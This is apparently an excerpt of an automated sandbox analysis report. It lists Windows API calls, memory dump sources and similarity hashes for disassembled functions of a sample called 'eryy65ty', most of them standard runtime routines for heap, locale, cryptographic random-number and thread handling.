                                                                                                      • _free.LIBCMT ref: 00EA766A
                                                                                                        • Part of subcall function 00EA4646: RtlFreeHeap.NTDLL(00000000,00000000,?,00EA1489), ref: 00EA465C
                                                                                                        • Part of subcall function 00EA4646: GetLastError.KERNEL32(?,?,00EA1489), ref: 00EA466E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$AllocateErrorFreeLast_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 314386986-0
                                                                                                      • Opcode ID: d58a5d752df34cb8591b035e1fcee0776572abf69335ca5a2c850e8c226de301
                                                                                                      • Instruction ID: defb828baa61e9c4d31d3047c1256d8cc21f2d25493aee1fdc4ab3c0841cafe9
                                                                                                      • Opcode Fuzzy Hash: d58a5d752df34cb8591b035e1fcee0776572abf69335ca5a2c850e8c226de301
                                                                                                      • Instruction Fuzzy Hash: 71F096B10057048FD334DF14D885752B7F8EB49715F10882EE29A9BA91D774B844CB94
                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,00000011,?,00E8EE48,00000000,00000011,00000001,?), ref: 00EA607B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: 09081276912ca74e9190e5fa33041e9c777b3e1642078f1db71b95545b207613
                                                                                                      • Instruction ID: ae02063a024b60aaf15a77d8e528d513e2ce592ceb2ba1c3f33af2922fbfb48b
                                                                                                      • Opcode Fuzzy Hash: 09081276912ca74e9190e5fa33041e9c777b3e1642078f1db71b95545b207613
                                                                                                      • Instruction Fuzzy Hash: B2E0E5221001156BEA3237268C84BAF3A8C9F4B3A4F1D2120AD54FE490CB90FC8081E0
                                                                                                      APIs
                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00E8283B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                      • String ID:
                                                                                                      • API String ID: 118556049-0
                                                                                                      • Opcode ID: fe0a313091af9978a2c7f6f323d4acc5230750c52c5440a99524e1847d91aaf4
                                                                                                      • Instruction ID: 78a4be58848920b92632af20259d1d9a848130ba7973eafb554f111f07edc214
                                                                                                      • Opcode Fuzzy Hash: fe0a313091af9978a2c7f6f323d4acc5230750c52c5440a99524e1847d91aaf4
                                                                                                      • Instruction Fuzzy Hash: 6AE0DFB11000000ADB0CB330885A55E62C18B10365B64A67DE22EE61A1D720C8518300
                                                                                                      APIs
                                                                                                      • WSAStartup.WS2_32(00000002,00000002), ref: 00E31040
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Startup
                                                                                                      • String ID:
                                                                                                      • API String ID: 724789610-0
                                                                                                      • Opcode ID: 2a67467786ecc80d155750a998c2af110dc9a007ca63da7c37507c7ed8c3984b
                                                                                                      • Instruction ID: 81a3014ac0baed82cd5182beff4069f8680c50e9998434a0fffd9803a83362a3
                                                                                                      • Opcode Fuzzy Hash: 2a67467786ecc80d155750a998c2af110dc9a007ca63da7c37507c7ed8c3984b
                                                                                                      • Instruction Fuzzy Hash: 03F0E571A493844FD320B7389C47BB973D8DB59310F40152AE95EDE2E1EE619804CBC3
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 00E9CD26
                                                                                                        • Part of subcall function 00EA4646: RtlFreeHeap.NTDLL(00000000,00000000,?,00EA1489), ref: 00EA465C
                                                                                                        • Part of subcall function 00EA4646: GetLastError.KERNEL32(?,?,00EA1489), ref: 00EA466E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFreeHeapLast_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1353095263-0
                                                                                                      • Opcode ID: 8bb73d17a6f27a1bdef89ce5174718c85a118b8b623a2085e2e28a2c055196e7
                                                                                                      • Instruction ID: e3ea28c31df282dd7367c3cfd3b6b014aa8fb82aba19f4f0314294881555ef25
                                                                                                      • Opcode Fuzzy Hash: 8bb73d17a6f27a1bdef89ce5174718c85a118b8b623a2085e2e28a2c055196e7
                                                                                                      • Instruction Fuzzy Hash: C6C08C7140420CBBCF10DF85E906A5EBBA8DBC6320F200188FC0C1B340DAB2AE1096C4
                                                                                                      APIs
                                                                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00E3FDCD,?,AB1AAB9C), ref: 00E8BB6E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoNativeSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 1721193555-0
                                                                                                      • Opcode ID: 35c78cc9bec13153ab589107c1e73c14816659affb0d78769b52eb51b3330afb
                                                                                                      • Instruction ID: 37943584d25d7f6d917f45d354069a667524a5ea9d1a6f49d653d2fd4d5f7076
                                                                                                      • Opcode Fuzzy Hash: 35c78cc9bec13153ab589107c1e73c14816659affb0d78769b52eb51b3330afb
                                                                                                      • Instruction Fuzzy Hash: A8C09B7490410D9BCB00E7E9D94989F77FCA70C104F400551D551F3140E770F9498B91
                                                                                                      APIs
                                                                                                      • CreateEventW.KERNEL32 ref: 00E33C0C
                                                                                                      • GetLastError.KERNEL32 ref: 00E33C18
                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E33C4D
                                                                                                      • GetLastError.KERNEL32 ref: 00E33C5A
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00E33C65
                                                                                                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?), ref: 00E33D5E
                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00E33D67
                                                                                                      • TerminateThread.KERNEL32(00000000,00000000,?,?,?), ref: 00E33D7E
                                                                                                      • QueueUserAPC.KERNEL32(00E33670,00000000,00000000,?,?,?), ref: 00E33D8B
                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?), ref: 00E33D96
                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00E33DA6
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?), ref: 00E33DBE
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?), ref: 00E33DC3
                                                                                                      • DeleteCriticalSection.KERNEL32(?,?,?,?), ref: 00E33DC9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle$CreateErrorEventLastWait$CriticalDeleteMultipleObjectObjectsQueueSectionSingleTerminateThreadUser
                                                                                                      • String ID: @a$event$mutex
                                                                                                      • API String ID: 55513473-2067588630
                                                                                                      • Opcode ID: 45b728c62be2752e7b7a8a3f30476a7cf429d366b425a8444603b47946ac8f0e
                                                                                                      • Instruction ID: b46c3a10c4abdcf8ae0fa6b17f1d2e42be7372eb082e9e153febedb51d27de45
                                                                                                      • Opcode Fuzzy Hash: 45b728c62be2752e7b7a8a3f30476a7cf429d366b425a8444603b47946ac8f0e
                                                                                                      • Instruction Fuzzy Hash: 79818971A04706ABDB10DFA6CC49BABFBB4BF44304F10521AE815B7790D7B5AA58CBD0
                                                                                                      APIs
                                                                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00EAE1C1,?,00000000), ref: 00EADF34
                                                                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00EAE1C1,?,00000000), ref: 00EADF5D
                                                                                                      • GetACP.KERNEL32(?,?,00EAE1C1,?,00000000), ref: 00EADF72
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale
                                                                                                      • String ID: ACP$OCP
                                                                                                      • API String ID: 2299586839-711371036
                                                                                                      • Opcode ID: 66ea555a527cbc19cb92f2a692b547108a916d48263d107d2193a2835d46562e
                                                                                                      • Instruction ID: 05af35881d9a6d847fc4b09018ff1eaa2cc24c1bad1d0bb5c7139429cb5e5a0f
                                                                                                      • Opcode Fuzzy Hash: 66ea555a527cbc19cb92f2a692b547108a916d48263d107d2193a2835d46562e
                                                                                                      • Instruction Fuzzy Hash: 2421B566B08101AED7308F24CD00AD772A6AF5AB68B56A564F90BFF900E732FD41C350
                                                                                                      APIs
                                                                                                        • Part of subcall function 00EA43FF: GetLastError.KERNEL32(?,?,00E98DBE,00EE40B0,00000010), ref: 00EA4403
                                                                                                        • Part of subcall function 00EA43FF: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00E98DBE,00EE40B0,00000010), ref: 00EA44A7
                                                                                                      • GetACP.KERNEL32(?,?,?,?,?,?,00EA202F,?,?,?,?,?,?,00000004), ref: 00EAD806
                                                                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00EA202F,?,?,?,?,?,?,00000004), ref: 00EAD818
                                                                                                      • _wcschr.LIBVCRUNTIME ref: 00EAD8A8
                                                                                                      • _wcschr.LIBVCRUNTIME ref: 00EAD8B6
                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00EA202F,00000000,00EA214F), ref: 00EAD959
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                      • String ID:
                                                                                                      • API String ID: 4147378913-0
                                                                                                      • Opcode ID: 902ceb82d4a1589d75f72ef0c93c1d28a8727a32dd45cd145aff6a7935c6cd2c
                                                                                                      • Instruction ID: 185aa3d8d7247e46f0393bac028c6db8ac0134260961c5d14d4e412e8c82bdea
                                                                                                      • Opcode Fuzzy Hash: 902ceb82d4a1589d75f72ef0c93c1d28a8727a32dd45cd145aff6a7935c6cd2c
                                                                                                      • Instruction Fuzzy Hash: 5F71F971608206AADB29AB75CC42BAB73E8EF4E714F14542AF506FF981EB74F9018750
                                                                                                      APIs
                                                                                                        • Part of subcall function 00EA43FF: GetLastError.KERNEL32(?,?,00E98DBE,00EE40B0,00000010), ref: 00EA4403
                                                                                                        • Part of subcall function 00EA43FF: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00E98DBE,00EE40B0,00000010), ref: 00EA44A7
                                                                                                        • Part of subcall function 00EA43FF: _free.LIBCMT ref: 00EA445A
                                                                                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00EAE182
                                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 00EAE1DD
                                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 00EAE1EC
                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,00EA2028,00000040,?,00EA2148,00000055,00000000,?,?,00000055,00000000), ref: 00EAE234
                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00EA20A8,00000040), ref: 00EAE253
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1213562535-0
                                                                                                      • Opcode ID: 10238f56f83f7db5a1db9b4b825084d31beaee34c57b9455818491904dda8e77
                                                                                                      • Instruction ID: c0d41548fe7fb5c77aeae895a57aff5726569c90c45b967ba79a25e045df8418
                                                                                                      • Opcode Fuzzy Hash: 10238f56f83f7db5a1db9b4b825084d31beaee34c57b9455818491904dda8e77
                                                                                                      • Instruction Fuzzy Hash: 27519071A01219AFDB20EFA5CC41ABE77B8FF5E700F045569E914FF290E7B0A9048B61
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(AB1AAB9C,?,?), ref: 00E78068
                                                                                                      • BCryptCloseAlgorithmProvider.BCRYPT(00000000,00000000), ref: 00E783E0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AlgorithmCloseCryptErrorLastProvider
                                                                                                      • String ID: operation failed with error $OS_Rng:
                                                                                                      • API String ID: 3861079404-700108173
                                                                                                      • Opcode ID: 905e333a8c3cde4c2bb3a8d0ba509d688f64322ebd80b9c3554f7496483c97d3
                                                                                                      • Instruction ID: eb9e3cc21cdc8e981eaa5e2f09ae91a6efaf17617ec2633c1531b91e3d37f51b
                                                                                                      • Opcode Fuzzy Hash: 905e333a8c3cde4c2bb3a8d0ba509d688f64322ebd80b9c3554f7496483c97d3
                                                                                                      • Instruction Fuzzy Hash: 3DB1D271A002589BEB18CB68CD85BDEBBB1FF95304F209258E448B72D2DB709A84CB51
                                                                                                      APIs
                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E8E4ED
                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 00E8E5B9
                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E8E5D9
                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00E8E5E3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                      • String ID:
                                                                                                      • API String ID: 254469556-0
                                                                                                      • Opcode ID: 212b7e0f5dc537fea115c8ab714a430fb8cf15e029ab8fd80be336d7a49be69d
                                                                                                      • Instruction ID: 288f5865e7aae6e92c5ac921378828ff8f5b6d2bf60284dc7f73958f42e1b0d0
                                                                                                      • Opcode Fuzzy Hash: 212b7e0f5dc537fea115c8ab714a430fb8cf15e029ab8fd80be336d7a49be69d
                                                                                                      • Instruction Fuzzy Hash: C4311AB5D45218DBDB20EFA5D949BCDBBF8AF08304F1041AAE40CB7250EB715A898F45
                                                                                                      APIs
                                                                                                        • Part of subcall function 00E784E0: __Mtx_unlock.LIBCPMT ref: 00E78584
                                                                                                      • BCryptGenRandom.BCRYPT(00000000,?,?,00000000,AB1AAB9C), ref: 00E7845C
                                                                                                      • SetLastError.KERNEL32(00000000), ref: 00E7848B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CryptErrorLastMtx_unlockRandom
                                                                                                      • String ID: BCryptGenRandom
                                                                                                      • API String ID: 3936926508-3013187443
                                                                                                      • Opcode ID: ffe4dc1d295de10d3332506869bc99db865bbf6502d5468f887264c83ff6a338
                                                                                                      • Instruction ID: a3539f5be90f1e8894878ab17fa6613b2d94506ca767853b5c5dc054aba9abc3
                                                                                                      • Opcode Fuzzy Hash: ffe4dc1d295de10d3332506869bc99db865bbf6502d5468f887264c83ff6a338
                                                                                                      • Instruction Fuzzy Hash: 03113071940218AFCB14EFA0CD4AFDEB7BCFB14714F005569B919B7291EF7465048B50
                                                                                                      APIs
                                                                                                      • BCryptCloseAlgorithmProvider.BCRYPT(?,00000000), ref: 00E78403
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AlgorithmCloseCryptProvider
                                                                                                      • String ID:
                                                                                                      • API String ID: 3378198380-0
                                                                                                      • Opcode ID: ce8939e481e442486165d2cddd7567d575ee481311f69f4de63c90909c06316a
                                                                                                      • Instruction ID: 750c54d10ea4b1a275395c790a4beb4a49b173441b91df7ef7674831248bae57
                                                                                                      • Opcode Fuzzy Hash: ce8939e481e442486165d2cddd7567d575ee481311f69f4de63c90909c06316a
                                                                                                      • Instruction Fuzzy Hash: 15D05B7178431111E22065145D05B8B56C85F61705F04D419F58CB63C1DAF0DC4043A5
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00E8CE9C
                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00E8CEAA
                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00E8CEBB
                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00E8CECC
                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00E8CEDD
                                                                                                      • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00E8CEEE
                                                                                                      • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00E8CEFF
